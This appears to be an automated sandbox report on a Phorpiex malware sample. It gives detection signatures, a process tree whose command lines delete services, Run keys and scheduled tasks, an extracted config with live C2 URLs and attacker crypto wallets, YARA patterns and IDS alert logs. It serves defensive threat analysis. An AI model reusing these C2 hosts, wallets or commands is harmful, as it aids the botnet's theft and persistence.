Windows Analysis Report
a0RkmvhSaf.exe

Overview

General Information

Sample name: a0RkmvhSaf.exe (renamed because original name is a hash value)
Original sample name: 4c52cf849be8954638925c242e0cc976.exe
Analysis ID: 1632967
MD5: 4c52cf849be8954638925c242e0cc976
SHA1: 949ba0061ea9dbe3b9059bb2a7b20caa74861280
SHA256: fa6fcf2e154c0b18b12ab86267ccd38d79cc9c27e7e261a7e9201a0a9dd9d0bb
Tags: exe, user-abuse_ch

Detection

Phorpiex
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Phorpiex
Allocates memory in foreign processes
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Joe Sandbox ML detected suspicious sample
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • a0RkmvhSaf.exe (PID: 8580 cmdline: "C:\Users\user\Desktop\a0RkmvhSaf.exe" MD5: 4C52CF849BE8954638925C242E0CC976)
    • 230053364.exe (PID: 8652 cmdline: C:\Users\user\AppData\Local\Temp\230053364.exe MD5: 87DCE6B601DA9E68982EF5BC7628468C)
      • sysludpvs.exe (PID: 8672 cmdline: C:\Windows\sysludpvs.exe MD5: 87DCE6B601DA9E68982EF5BC7628468C)
        • 152942395.exe (PID: 8952 cmdline: C:\Users\user\AppData\Local\Temp\152942395.exe MD5: C87843A4C7972D85F0D739E0E32F61AD)
          • 634722489.exe (PID: 9168 cmdline: C:\Users\user\AppData\Local\Temp\634722489.exe MD5: 64D97CEAC5D0FBB39F316EB8707C5AF4)
            • conhost.exe (PID: 9208 cmdline: "C:\Windows\System32\conhost.exe" "" MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WerFault.exe (PID: 6764 cmdline: C:\Windows\system32\WerFault.exe -u -p 9208 -s 944 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
          • 2052810334.exe (PID: 6864 cmdline: C:\Users\user\AppData\Local\Temp\2052810334.exe MD5: B1C1D77E69753D822893438B35B2E7CC)
            • cmd.exe (PID: 6924 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 6708 cmdline: sc delete "Windows Services" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 6916 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 417928448.exe (PID: 8500 cmdline: C:\Users\user\AppData\Local\Temp\417928448.exe MD5: 38C5CE383F70DC49175CC5843F017FF9)
            • cmd.exe (PID: 8424 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 1828 cmdline: sc delete "WinSrvcsDrv" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 8620 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 2047112978.exe (PID: 6084 cmdline: C:\Users\user\AppData\Local\Temp\2047112978.exe MD5: 9E1AAFB6D1C75D75F7E1A8E135F9C508)
            • cmd.exe (PID: 476 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinUpla" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 1936 cmdline: sc delete "WinUpla" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 8656 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 399630275.exe (PID: 1364 cmdline: C:\Users\user\AppData\Local\Temp\399630275.exe MD5: 38C5CE383F70DC49175CC5843F017FF9)
            • cmd.exe (PID: 3816 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 1312 cmdline: sc delete "WinSrvcsDrv" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 1940 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 2028814805.exe (PID: 2332 cmdline: C:\Users\user\AppData\Local\Temp\2028814805.exe MD5: 11BFAECFB780B663434E2CCC81873C64)
            • cmd.exe (PID: 2340 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • reg.exe (PID: 3324 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • cmd.exe (PID: 3148 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Service" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 3492 cmdline: schtasks /delete /f /tn "Windows Upgrade Service" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • 393932919.exe (PID: 3564 cmdline: C:\Users\user\AppData\Local\Temp\393932919.exe MD5: 5E24B9457135B737012CDE5E30CF124B)
            • cmd.exe (PID: 2568 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinDrvUpd" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 4544 cmdline: sc delete "WinDrvUpd" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 1468 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 1216017805.exe (PID: 4996 cmdline: C:\Users\user\AppData\Local\Temp\1216017805.exe MD5: 02320B5A9FFB3AA91FC2FE0F0906C575)
            • cmd.exe (PID: 5608 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • reg.exe (PID: 9020 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • cmd.exe (PID: 6288 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 6460 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • 38822795.exe (PID: 6588 cmdline: C:\Users\user\AppData\Local\Temp\38822795.exe MD5: 9F3B28CD269F23EB326C849CB6D8ED3D)
            • cmd.exe (PID: 9188 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 9172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 428 cmdline: sc delete "WinUpdt" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 1400 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 396820397.exe (PID: 5380 cmdline: C:\Users\user\AppData\Local\Temp\396820397.exe MD5: 8F1F692C2E839E6F821E42057F8B1C01)
            • cmd.exe (PID: 8260 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinMngr" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 3804 cmdline: sc delete "WinMngr" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 6824 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • sysludpvs.exe (PID: 9076 cmdline: "C:\Windows\sysludpvs.exe" MD5: 87DCE6B601DA9E68982EF5BC7628468C)
  • cleanup
{"C2 url": ["http://91.202.233.141/", "http://45.93.20.18/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "lava@100le8y8x7w4uls8dhkuvtzten5jyvxgfj0crhw", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "EQBeqKxk-pwQ86KK0jwau5NKkjk9c-xtDR8kU5YP3OgROvlE", "Cz6xMbBst86mjM44qAaE5ahkD3F8JpLY7LFGHMiKYzwS6mn", "CSLKveRL2zqkbV2TqiFVuW6twtpqgFajoUZLAJQTTQk2", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd1a", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb"]}
Source | Rule | Description | Author | Strings
00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x39f6:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Donutloader_5c38878d | unknown | unknown
  • 0x414d:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1
00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x32a6:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Donutloader_5c38878d | unknown | unknown
  • 0x39fd:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1
Process Memory Space: 230053364.exe PID: 8652 | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security

    System Summary

    Source: Registry Key set
    Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
    Data: Details: C:\Windows\sysludpvs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\230053364.exe, ProcessId: 8652, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-09T13:55:00.453495+0100 | 2022482 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:05.878380+0100 | 2022482 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:11.407235+0100 | 2022482 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-09T13:53:47.442508+0100 | 2021954 | 1 | A Network Trojan was detected | 91.202.233.141 | 80 | 192.168.2.5 | 49715 | TCP
    2025-03-09T13:55:05.651672+0100 | 2021954 | 1 | A Network Trojan was detected | 91.202.233.141 | 80 | 192.168.2.5 | 49715 | TCP
    2025-03-09T13:55:11.183356+0100 | 2021954 | 1 | A Network Trojan was detected | 91.202.233.141 | 80 | 192.168.2.5 | 49715 | TCP
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-09T13:54:11.531492+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:17.250570+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:22.798147+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:28.093929+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:33.402546+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:38.687979+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:44.235197+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:49.628982+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:55.063271+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-09T13:54:05.669674+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 92.244.232.104 | 40500 | UDP
    2025-03-09T13:54:10.679974+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 37.150.149.45 | 40500 | UDP
    2025-03-09T13:54:15.799890+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 5.76.154.73 | 40500 | UDP
    2025-03-09T13:54:25.819396+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 5.233.112.110 | 40500 | UDP
    2025-03-09T13:54:35.823349+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 37.151.27.190 | 40500 | UDP
    2025-03-09T13:54:40.820928+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 79.164.150.28 | 40500 | UDP
    2025-03-09T13:54:45.819654+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 213.206.60.173 | 40500 | UDP
    2025-03-09T13:54:50.835431+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 213.206.62.251 | 40500 | UDP
    2025-03-09T13:54:55.850747+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 151.233.107.54 | 40500 | UDP
    2025-03-09T13:55:00.866581+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 93.188.86.253 | 40500 | UDP
    2025-03-09T13:55:10.882436+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 113.86.140.229 | 40500 | UDP
    2025-03-09T13:55:15.889415+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 178.88.234.209 | 40500 | UDP
    2025-03-09T13:55:20.898234+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 146.70.53.161 | 40500 | UDP
    2025-03-09T13:55:35.916043+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 147.30.105.215 | 40500 | UDP
    2025-03-09T13:55:40.913812+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 90.156.165.93 | 40500 | UDP
    2025-03-09T13:55:45.928871+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 2.181.203.195 | 40500 | UDP
    2025-03-09T13:55:50.944333+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 216.107.138.162 | 40500 | UDP
    2025-03-09T13:55:56.560493+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 95.56.224.166 | 40500 | UDP
    2025-03-09T13:56:26.616255+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 95.142.87.201 | 40500 | UDP
    2025-03-09T13:56:31.642799+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 178.253.102.216 | 40500 | UDP
    2025-03-09T13:56:46.663102+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 95.58.24.170 | 40500 | UDP
    2025-03-09T13:57:06.726544+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 89.35.132.112 | 40500 | UDP
    2025-03-09T13:57:31.758230+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 2.180.93.42 | 40500 | UDP
    2025-03-09T13:57:36.759089+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 78.39.225.185 | 40500 | UDP
    2025-03-09T13:57:51.788766+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65203 | 93.180.124.3 | 40500 | UDP
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-09T13:53:55.970019+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49709 | 185.215.113.66 | 80 | TCP
    2025-03-09T13:53:58.710704+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49709 | 185.215.113.66 | 80 | TCP
    2025-03-09T13:54:03.751692+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49710 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:05.548445+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:11.531492+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:11.974570+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:14.260907+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:16.549798+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:17.250570+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:18.805223+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:22.798147+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:23.605572+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49587 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:54:27.367765+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49589 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:54:28.093929+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:31.133646+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49591 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:54:33.402546+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:34.930434+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49592 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:54:38.687979+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:38.713259+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49594 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:54:42.727357+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49595 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:44.235197+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:45.528581+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49596 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:47.781200+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49596 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:49.628982+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:50.063393+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49596 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:52.327644+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49596 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:55.063271+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:57.181848+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49598 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:00.453495+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:00.966612+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49600 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:04.747416+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49601 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:05.878380+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:08.528664+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49603 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:11.407235+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:12.291313+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49605 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:16.297318+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49607 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:19.093052+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49608 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:21.862183+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49610 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:24.602892+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49611 | 91.202.233.141 | 80 | TCP
